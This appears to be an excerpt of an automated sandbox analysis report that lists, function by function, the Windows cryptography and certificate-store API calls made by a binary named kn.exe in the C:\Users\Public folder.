              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC96374 memset,#358,#357,LocalFree,LocalFree,#357,#357,_strlwr,#357,LocalFree,LocalFree,lstrcmpW,#359,#359,#357,CryptAcquireContextW,GetLastError,#256,CryptGenRandom,GetLastError,#254,#357,fopen,fopen,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,LocalAlloc,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,#357,LocalFree,#357,fprintf,fprintf,CertOpenStore,GetLastError,LocalAlloc,CertSaveStore,GetLastError,#357,CertCloseStore,CertFreeCertificateContext,CertFreeCertificateContext,fclose,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptDestroyKey,CryptReleaseContext,CryptReleaseContext,fprintf,fprintf,fflush,ferror,7_2_00007FF68FC96374
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC92358 #357,#357,CryptReleaseContext,CryptReleaseContext,CertFreeCertificateContext,CertFreeCertificateContext,7_2_00007FF68FC92358
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC40300 NCryptOpenStorageProvider,#357,#357,#357,#357,#357,#357,#357,LocalFree,LocalFree,LocalFree,LocalFree,NCryptFreeObject,#357,7_2_00007FF68FC40300
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FD0A2E0 NCryptOpenStorageProvider,NCryptOpenKey,NCryptFreeObject,7_2_00007FF68FD0A2E0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCC2278 CryptAcquireContextW,GetLastError,CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,LocalAlloc,memmove,#357,#357,CryptDestroyHash,CryptReleaseContext,7_2_00007FF68FCC2278
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC76280 #357,#254,#357,CertGetCRLContextProperty,GetLastError,memcmp,#254,#357,#360,#360,CertGetPublicKeyLength,GetLastError,#359,strcmp,GetLastError,CryptFindOIDInfo,#357,LocalFree,CryptFindOIDInfo,#357,#357,#359,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,7_2_00007FF68FC76280
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCD8298 #357,CryptFindOIDInfo,LocalAlloc,#357,memmove,7_2_00007FF68FCD8298
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCCE274 GetLastError,#358,CryptAcquireCertificatePrivateKey,GetLastError,#357,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#357,LocalFree,NCryptIsKeyHandle,GetLastError,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,7_2_00007FF68FCCE274
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FD06214 CryptDecodeObjectEx,CryptDecodeObjectEx,SetLastError,7_2_00007FF68FD06214
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC9E1F8 CertSaveStore,GetLastError,LocalAlloc,#357,CertSaveStore,GetLastError,#357,LocalFree,#357,#357,NCryptOpenStorageProvider,NCryptImportKey,NCryptSetProperty,NCryptFinalizeKey,LocalFree,LocalFree,NCryptFreeObject,7_2_00007FF68FC9E1F8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCDA1F8 LocalAlloc,CryptEnumProvidersA,GetLastError,#358,LocalFree,#357,7_2_00007FF68FCDA1F8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC8A1E8 LocalFree,CryptHashCertificate2,CertGetCRLContextProperty,CertGetNameStringA,memmove,memmove,GetLastError,GetLastError,#357,GetLastError,#357,GetLastError,GetLastError,GetLastError,#357,LocalFree,memmove,GetLastError,#357,GetLastError,#359,LocalFree,7_2_00007FF68FC8A1E8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC86194 CryptQueryObject,GetLastError,CertEnumCertificatesInStore,CertAddStoreToCollection,GetLastError,#357,CertCloseStore,CertFreeCertificateContext,7_2_00007FF68FC86194
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC6417C #360,#360,#359,#357,#357,#357,#357,CryptDestroyKey,CryptGetUserKey,GetLastError,#358,LocalFree,LocalFree,LocalFree,CryptDestroyKey,7_2_00007FF68FC6417C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCC61AC SysStringLen,SysStringLen,CryptStringToBinaryW,GetLastError,#357,7_2_00007FF68FCC61AC
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC421A4 #360,#359,#357,#357,BCryptFreeBuffer,7_2_00007FF68FC421A4
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FD0613C CryptDecodeObjectEx,7_2_00007FF68FD0613C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC360DA #357,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptMsgClose,CertFreeCTLContext,CertFreeCertificateContext,CertCloseStore,LocalFree,7_2_00007FF68FC360DA
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCCE044 NCryptIsKeyHandle,CryptGetProvParam,GetLastError,#357,LocalAlloc,#359,LocalFree,7_2_00007FF68FCCE044
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC74070 _wcsnicmp,_wcsnicmp,_wcsnicmp,#357,GetLastError,#359,#357,LocalAlloc,memmove,wcsstr,#223,#357,#359,LocalFree,#359,LocalFree,LocalFree,LocalFree,LocalFree,CryptMemFree,7_2_00007FF68FC74070
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC35FE8 #357,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptMsgClose,CertFreeCTLContext,CertFreeCertificateContext,CertCloseStore,LocalFree,7_2_00007FF68FC35FE8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FD05FF0 CryptDecodeObjectEx,CryptDecodeObjectEx,7_2_00007FF68FD05FF0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCA9F90 memmove,wcscmp,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,BCryptSignHash,#205,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,#357,_CxxThrowException,_CxxThrowException,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,7_2_00007FF68FCA9F90
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCA5FA8 NCryptIsKeyHandle,wcscmp,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,7_2_00007FF68FCA5FA8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC75F54 GetLastError,LocalAlloc,memmove,wcschr,CryptFindOIDInfo,#357,#357,LocalFree,LocalFree,7_2_00007FF68FC75F54
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC3FF64 NCryptGetProperty,#359,NCryptGetProperty,CertEnumCertificatesInStore,CertFindCertificateInStore,CertFreeCertificateContext,CertEnumCertificatesInStore,CertFreeCertificateContext,CertCloseStore,CertCloseStore,#357,7_2_00007FF68FC3FF64
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC57F14 CryptAcquireCertificatePrivateKey,GetLastError,#357,CryptSetProvParam,GetLastError,GetSecurityDescriptorLength,#359,CryptReleaseContext,7_2_00007FF68FC57F14
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC95F04 #357,#357,SysAllocStringByteLen,#357,SysFreeString,#357,#359,#357,lstrcmpW,CryptMsgControl,GetLastError,#357,CertFreeCertificateContext,#359,CertFreeCTLContext,LocalFree,SysFreeString,LocalFree,7_2_00007FF68FC95F04
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FD05F20 CryptDecodeObjectEx,7_2_00007FF68FD05F20
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCD7EE8 CryptFindOIDInfo,#357,CryptInitOIDFunctionSet,CryptGetOIDFunctionAddress,GetLastError,GetLastError,GetLastError,#357,strcmp,GetLastError,strcmp,GetLastError,CryptFindOIDInfo,CryptFindOIDInfo,#357,LocalFree,LocalFree,CryptFreeOIDFunctionAddress,LocalFree,LocalFree,7_2_00007FF68FCD7EE8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC8DEB0 wcscspn,#357,GetFileAttributesW,GetLastError,#359,CertEnumCertificatesInStore,CertGetCRLContextProperty,CryptBinaryToStringW,wcsstr,CertEnumCertificatesInStore,GetLastError,GetLastError,LocalFree,LocalFree,CertCloseStore,CertFreeCertificateContext,7_2_00007FF68FC8DEB0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC5DEA4 memset,GetSystemTimeAsFileTime,CryptGenRandom,GetLastError,LocalAlloc,GetLastError,#357,GetLastError,#357,LocalFree,LocalFree,LocalFree,LocalFree,CryptReleaseContext,CryptAcquireContextW,LocalFree,7_2_00007FF68FC5DEA4
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FD05E3C CryptDecodeObjectEx,strcmp,strcmp,strcmp,7_2_00007FF68FD05E3C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCCDE70 NCryptIsKeyHandle,#357,CryptExportKey,GetLastError,#358,LocalAlloc,#357,CryptExportKey,GetLastError,LocalFree,7_2_00007FF68FCCDE70
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC35DF7 GetLastError,#357,#357,#358,#358,CertEnumCertificatesInStore,CertEnumCertificatesInStore,CertEnumCRLsInStore,CertEnumCRLsInStore,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptMsgClose,CertFreeCTLContext,CertFreeCertificateContext,CertCloseStore,LocalFree,#357,7_2_00007FF68FC35DF7
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC91E2C CryptAcquireContextW,GetLastError,#357,CryptGenKey,GetLastError,CryptDestroyKey,#357,GetLastError,#357,#357,LocalAlloc,#357,memmove,LocalFree,memset,CryptGenRandom,GetLastError,#357,GetSystemTime,SystemTimeToFileTime,GetLastError,CertCreateCertificateContext,GetLastError,CryptReleaseContext,LocalFree,LocalFree,LocalFree,7_2_00007FF68FC91E2C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC11DE8 GetSystemDefaultLangID,wcscspn,LocalFree,LocalFree,CryptEnumOIDInfo,qsort,free,7_2_00007FF68FC11DE8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCB5D80 #357,NCryptIsKeyHandle,GetSecurityDescriptorLength,CryptSetProvParam,GetLastError,LocalFree,#357,7_2_00007FF68FCB5D80
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC5DD80 CertFindExtension,CryptDecodeObject,7_2_00007FF68FC5DD80
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC35DA1 #358,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptMsgClose,CertFreeCTLContext,CertFreeCertificateContext,CertCloseStore,LocalFree,7_2_00007FF68FC35DA1
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCD7D3C #357,CryptFindOIDInfo,CryptFindOIDInfo,CryptFindOIDInfo,wcschr,CryptFindOIDInfo,#359,LocalFree,7_2_00007FF68FCD7D3C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCDBD3C NCryptIsKeyHandle,#357,#357,CryptSetProvParam,GetLastError,#357,CryptSetProvParam,GetLastError,LocalFree,7_2_00007FF68FCDBD3C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FD05D74 CryptDecodeObjectEx,strcmp,strcmp,7_2_00007FF68FD05D74
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC59D6C #357,#357,#359,LocalAlloc,#357,#357,wcsrchr,LocalAlloc,memmove,CryptFindLocalizedName,wcsrchr,CryptFindLocalizedName,#357,GetLastError,#359,CertOpenStore,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,7_2_00007FF68FC59D6C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC61D70 #357,LocalAlloc,memmove,#357,CryptSetKeyParam,GetLastError,LocalAlloc,memmove,CryptDecrypt,GetLastError,#357,#357,#358,LocalFree,LocalFree,#357,#357,#357,LocalFree,LocalFree,LocalFree,7_2_00007FF68FC61D70
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC83D60 #359,GetLastError,#357,CryptSetProvParam,GetLastError,#357,CryptSetProvParam,GetLastError,CryptReleaseContext,7_2_00007FF68FC83D60
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCCFD2C CryptDecryptMessage,GetLastError,#357,7_2_00007FF68FCCFD2C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCBDD1C #357,strcmp,GetLastError,CryptHashCertificate,GetLastError,LocalAlloc,memmove,LocalFree,7_2_00007FF68FCBDD1C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC95CE8 #357,CertOpenStore,GetLastError,CertFindCertificateInStore,GetLastError,#359,LocalFree,CertFreeCertificateContext,CertCloseStore,CryptVerifyCertificateSignature,GetLastError,#357,7_2_00007FF68FC95CE8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC91C84 GetLastError,#357,CryptVerifyCertificateSignature,GetLastError,#357,LocalFree,#357,LocalFree,7_2_00007FF68FC91C84
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FD05C54 CryptDecodeObjectEx,CryptDecodeObjectEx,7_2_00007FF68FD05C54
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC41C50 BCryptQueryProviderRegistration,#360,#357,BCryptFreeBuffer,7_2_00007FF68FC41C50
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC53C60 CryptExportPublicKeyInfo,GetLastError,#357,LocalAlloc,CryptExportPublicKeyInfo,GetLastError,#357,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,LocalAlloc,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,CertCreateCertificateContext,GetLastError,#357,#357,CertComparePublicKeyInfo,LocalAlloc,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,LocalAlloc,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,CertSetCTLContextProperty,GetLastError,#357,#357,#358,#358,#357,#357,#357,LocalFree,LocalFree,LocalFree,LocalFree,CertFreeCertificateContext,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,7_2_00007FF68FC53C60
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC5FC34 memset,#357,CryptDecodeObject,GetLastError,LocalAlloc,#357,memmove,memset,GetLastError,#357,LocalFree,LocalFree,LocalFree,LocalFree,7_2_00007FF68FC5FC34
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC3FC20 #359,#357,NCryptOpenStorageProvider,#357,NCryptImportKey,GetLastError,#357,#357,LocalFree,LocalFree,NCryptFreeObject,#357,NCryptFreeObject,#357,7_2_00007FF68FC3FC20
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC29BC8 #357,strcmp,strcmp,CryptDecodeObject,strcmp,CryptDecodeObject,strcmp,strcmp,strcmp,CryptDecodeObject,strcmp,CryptDecodeObject,strcmp,CryptDecodeObject,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,CryptDecodeObject,GetLastError,strcmp,strcmp,strcmp,strcmp,GetLastError,strcmp,CryptDecodeObject,GetLastError,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,LocalFree,strcmp,SysFreeString,#357,#357,strcmp,SysFreeString,#357,SysFreeString,GetLastError,strcmp,LocalFree,LocalFree,CryptDecodeObject,strcmp,strcmp,strcmp,SysFreeString,LocalFree,7_2_00007FF68FC29BC8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCABBC0 wcscmp,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,CryptSignHashW,#205,GetLastError,#357,#359,#357,SetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,GetLastError,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,7_2_00007FF68FCABBC0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCA3BEB _CxxThrowException,_CxxThrowException,_CxxThrowException,CryptExportKey,#205,GetLastError,#357,#357,#357,#357,SetLastError,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,7_2_00007FF68FCA3BEB
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCCFB94 #357,CryptFindOIDInfo,LocalAlloc,CryptEncryptMessage,GetLastError,LocalFree,#357,7_2_00007FF68FCCFB94
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FD05B90 CryptDecodeObjectEx,memmove,7_2_00007FF68FD05B90
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC2BB80 #357,NCryptIsKeyHandle,#357,LocalFree,LocalFree,7_2_00007FF68FC2BB80
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC05BA4 #357,NCryptIsKeyHandle,strcmp,GetLastError,strcmp,GetLastError,SysAllocStringByteLen,#357,SysFreeString,#359,LocalAlloc,#357,GetLastError,GetLastError,GetLastError,#357,LocalFree,LocalFree,LocalFree,SysFreeString,CertFreeCertificateContext,LocalFree,LocalFree,CryptReleaseContext,7_2_00007FF68FC05BA4
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCAFB50 CryptExportPublicKeyInfo,GetLastError,#357,LocalAlloc,#357,CryptExportPublicKeyInfo,GetLastError,GetLastError,#357,#357,CertFindExtension,LocalAlloc,#357,memmove,#357,#357,#357,#357,#357,CAFindCertTypeByName,CAGetCertTypeExtensions,#357,#358,CertFindExtension,#357,LocalAlloc,memmove,memmove,#357,#357,GetLastError,#357,CertFindExtension,#357,GetLastError,#357,CryptSignAndEncodeCertificate,GetLastError,#357,LocalAlloc,CryptSignAndEncodeCertificate,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CAFreeCertTypeExtensions,CACloseCertType,7_2_00007FF68FCAFB50
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCDBB50 NCryptIsKeyHandle,#359,CertCreateCertificateContext,GetLastError,LocalFree,CryptGetKeyParam,GetLastError,#358,LocalAlloc,#357,CryptGetKeyParam,GetLastError,#357,7_2_00007FF68FCDBB50
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCD5B44 CertFindExtension,#357,CryptDecodeObject,GetLastError,7_2_00007FF68FCD5B44
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC6BB38 #357,CryptVerifyCertificateSignatureEx,GetLastError,#357,memcmp,GetSystemTimeAsFileTime,CompareFileTime,CompareFileTime,CompareFileTime,#357,#358,LocalFree,LocalFree,LocalFree,LocalFree,7_2_00007FF68FC6BB38
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCD7B60 GetLastError,#359,CryptGetProvParam,GetLastError,#357,CryptFindOIDInfo,LocalAlloc,#357,memmove,CryptReleaseContext,7_2_00007FF68FCD7B60
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC63B14 NCryptIsKeyHandle,CryptGetUserKey,GetLastError,#357,#357,#357,NCryptIsKeyHandle,#357,#357,LocalFree,CryptDestroyKey,7_2_00007FF68FC63B14
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC99AF8 CertCloseStore,CertCloseStore,CryptMsgClose,LocalFree,LocalFree,NCryptFreeObject,7_2_00007FF68FC99AF8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCCFA84 LocalAlloc,#357,memmove,CryptDecrypt,GetLastError,#357,LocalFree,7_2_00007FF68FCCFA84
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FD05AA8 CryptDecodeObjectEx,7_2_00007FF68FD05AA8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCBBA50 CryptSignCertificate,SetLastError,7_2_00007FF68FCBBA50
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCA1A44 CryptContextAddRef,_CxxThrowException,GetLastError,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,7_2_00007FF68FCA1A44
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC33A40 LocalFree,LocalFree,strcmp,#357,strcmp,LocalFree,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,LocalFree,strcmp,CryptDecodeObject,strcmp,LocalFree,strcmp,GetLastError,#357,LocalFree,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,GetLastError,#357,strcmp,strcmp,GetLastError,strcmp,CryptDecodeObject,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,GetLastError,strcmp,strcmp,strcmp,strcmp,#357,#357,CryptDecodeObject,GetLastError,GetLastError,strcmp,LocalFree,strcmp,LocalFree,GetLastError,strcmp,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,7_2_00007FF68FC33A40
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCA7A70 wcscmp,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,NCryptSignHash,#205,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,#357,_CxxThrowException,_CxxThrowException,NCryptSecretAgreement,#205,#357,#357,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,NCryptDeriveKey,#205,#359,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,7_2_00007FF68FCA7A70
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCB9A58 #357,#357,#210,#357,SetWindowTextW,SetFocus,SendMessageW,SendMessageW,LocalAlloc,#357,#357,LocalFree,UpdateWindow,CoInitialize,LoadCursorW,SetCursor,LoadCursorW,SetCursor,SetFocus,SetWindowTextW,SetFocus,#357,SetFocus,SendMessageW,#357,LocalFree,LocalFree,LocalFree,CryptUIDlgFreeCAContext,CoUninitialize,7_2_00007FF68FCB9A58
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCDBA14 NCryptIsKeyHandle,#357,CryptGetProvParam,GetLastError,NCryptFreeObject,7_2_00007FF68FCDBA14
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC8B9CC I_CryptWalkAllLruCacheEntries,I_CryptFindLruEntry,I_CryptRemoveLruEntry,#357,I_CryptWalkAllLruCacheEntries,I_CryptFindLruEntry,I_CryptRemoveLruEntry,#357,7_2_00007FF68FC8B9CC
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC2F9B8 strcmp,#357,#359,NCryptOpenStorageProvider,#357,NCryptImportKey,#357,NCryptSetProperty,NCryptFinalizeKey,NCryptFreeObject,NCryptFreeObject,#359,CryptImportPKCS8,GetLastError,#357,CryptGetUserKey,GetLastError,#357,CryptGetUserKey,GetLastError,CryptDestroyKey,CryptReleaseContext,LocalFree,7_2_00007FF68FC2F9B8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC37988 CryptFindOIDInfo,#357,CryptFindOIDInfo,#357,GetLastError,#357,GetLastError,#357,LocalFree,7_2_00007FF68FC37988
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC8597C GetLastError,CryptEncodeObjectEx,GetLastError,#357,7_2_00007FF68FC8597C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCFB980 #357,CryptFindOIDInfo,#359,GetLastError,#357,#359,CryptGetProvParam,memset,CryptGetProvParam,CryptFindOIDInfo,#357,GetLastError,#357,CryptReleaseContext,BCryptFreeBuffer,7_2_00007FF68FCFB980
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC8B950 I_CryptGetLruEntryData,#357,7_2_00007FF68FC8B950
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC5F944 CryptDecodeObject,GetLastError,#357,7_2_00007FF68FC5F944
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCC9970 LocalAlloc,#357,LocalAlloc,CertGetEnhancedKeyUsage,GetLastError,#358,LocalFree,LocalFree,GetLastError,strcmp,#357,CryptFindOIDInfo,LocalFree,7_2_00007FF68FCC9970
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC138FC RevertToSelf,#356,#357,LocalFree,NCryptFreeObject,CoUninitialize,DeleteCriticalSection,7_2_00007FF68FC138FC
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC23918 #357,#357,#357,#357,CertFindExtension,CryptDecodeObject,GetLastError,#357,LocalFree,LocalFree,LocalFree,LocalFree,7_2_00007FF68FC23918
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCCF918 CryptEncrypt,GetLastError,LocalFree,LocalAlloc,#357,LocalFree,7_2_00007FF68FCCF918
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCA391C CryptVerifySignatureW,#205,GetLastError,#357,#359,#357,SetLastError,7_2_00007FF68FCA391C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC8B8D0 I_CryptGetLruEntryData,#357,7_2_00007FF68FC8B8D0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC718DC CertFindExtension,CryptDecodeObject,GetLastError,#357,7_2_00007FF68FC718DC
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC79878 strcmp,strcmp,strcmp,#357,#357,CompareFileTime,LocalFree,CryptMsgClose,CertCloseStore,CompareFileTime,#357,#357,7_2_00007FF68FC79878
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC37884 GetLastError,CryptFindOIDInfo,#357,#357,LocalFree,7_2_00007FF68FC37884
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCD98B0 #357,CryptImportPublicKeyInfo,GetLastError,#357,CryptGenKey,GetLastError,CryptGenRandom,GetLastError,#357,CryptDestroyKey,CryptGetUserKey,GetLastError,CryptImportKey,GetLastError,#357,memcmp,#357,CryptDestroyKey,CryptDestroyKey,CryptDestroyKey,LocalFree,LocalFree,LocalFree,CryptReleaseContext,7_2_00007FF68FCD98B0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC8D850 #357,Sleep,BCryptCloseAlgorithmProvider,I_CryptFreeLruCache,7_2_00007FF68FC8D850
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC9184C CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,memset,CryptGetUserKey,GetLastError,CryptGetUserKey,GetLastError,#357,CryptImportKey,GetLastError,CryptDecrypt,GetLastError,GetLastError,#357,CryptDestroyKey,CryptDestroyHash,LocalFree,CryptDestroyKey,GetLastError,#357,LocalFree,7_2_00007FF68FC9184C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCA3860 CryptSetProvParam,#205,GetLastError,#357,#357,#357,SetLastError,7_2_00007FF68FCA3860
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC3F810 #223,CryptDecodeObjectEx,GetLastError,CertFindAttribute,CertFindAttribute,GetLastError,#357,LocalFree,LocalFree,7_2_00007FF68FC3F810
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC8B808 I_CryptFindLruEntry,I_CryptGetLruEntryData,#357,I_CryptReleaseLruEntry,7_2_00007FF68FC8B808
